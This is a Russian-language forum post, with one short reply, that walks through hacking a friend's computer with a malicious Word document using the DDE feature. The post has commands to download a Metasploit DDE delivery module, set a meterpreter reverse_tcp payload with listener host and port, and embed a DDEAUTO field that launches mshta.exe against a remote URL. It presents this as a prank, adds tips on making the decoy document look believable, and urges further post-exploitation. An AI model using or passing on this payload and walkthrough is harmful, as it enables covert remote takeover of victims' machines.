1 1 2 1 2
Sign in to follow this  
torx777

Взлом твоего друга через MS Office

Recommended Posts

Теория

DDE exploit используется для динамического обмена данных. Эта уязвимость позволяет передавать данные между приложениями MS Office без взаимодействия между пользователями. Этот метод используется для получения доступа к системе. Можно легко отправить файл другу с данными его "переписки" и он с большим любопытством будет открывать этот файл)

Установка

Необходимые составляющие для проведения атаки:

Устройство с Kali Linux.

Устройство с Windows.

Microsoft Office (Word).

Все описанные действия проводились в Kali Linux. Для начала нам необходимо установить компоненты и добавить их в базу Metasploit. Сначала скачаем эксплоит с помощью команды:

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Далее добавим эту утилиту в папку с эксплоитами Metasploit:

mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/

После этого можно переходить в msfconsole. Запускаем и производим обновления всех наших путей:

msfconsole reload_all

После этого можно переходить к генерации нашей полезной нагрузки. Для этого необходимо пошагово выполнять такие команды:

use exploit/windows/dde_delivery

Далее нам необходимо установить свой сервис чтобы принимать соединение, для этого нужно указать команду со своим IP адресом:

set SRVHOST 192.168.177.141 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.177.141 set LPORT 6708 exploit exploit

Подготавливаем документ MS Office

После этого получаем ссылку, которую нужно вмонтировать в документ MS Office. Для этого переходим в раздел "Вставить"->"Быстрые элементы"->"Поле" (Можно использовать быструю комбинацию CTRL + F9).

{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.1.6:8080/wi9o8uanVgkjv”}

После открытия документа откроется сессия. После открытия будут два всплывающих окна. Но они без каких либо запретов, просто уведомления о наличии сторонних связей с другими приложениями.

Готовая ссылка

Получаем сессию

Заключение

Вот таким способом можно получить доступ к компьютеру. Дальше смотрите в сторону пост эксплуатации. Там есть очень много чего интересного. Любите своих друзей и не заставляйте их скучать. Можно пошутить вот таким простым, но эффективным способом. Также формулы можно использовать и в других программах MS Office. Для более правдоподобного вида нужно наполнять документы тематическим содержанием.

Share this post


Link to post
Share on other sites

Такое чувство , будто  статья вырвана из контекста

Share this post


Link to post
Share on other sites
Sign in to follow this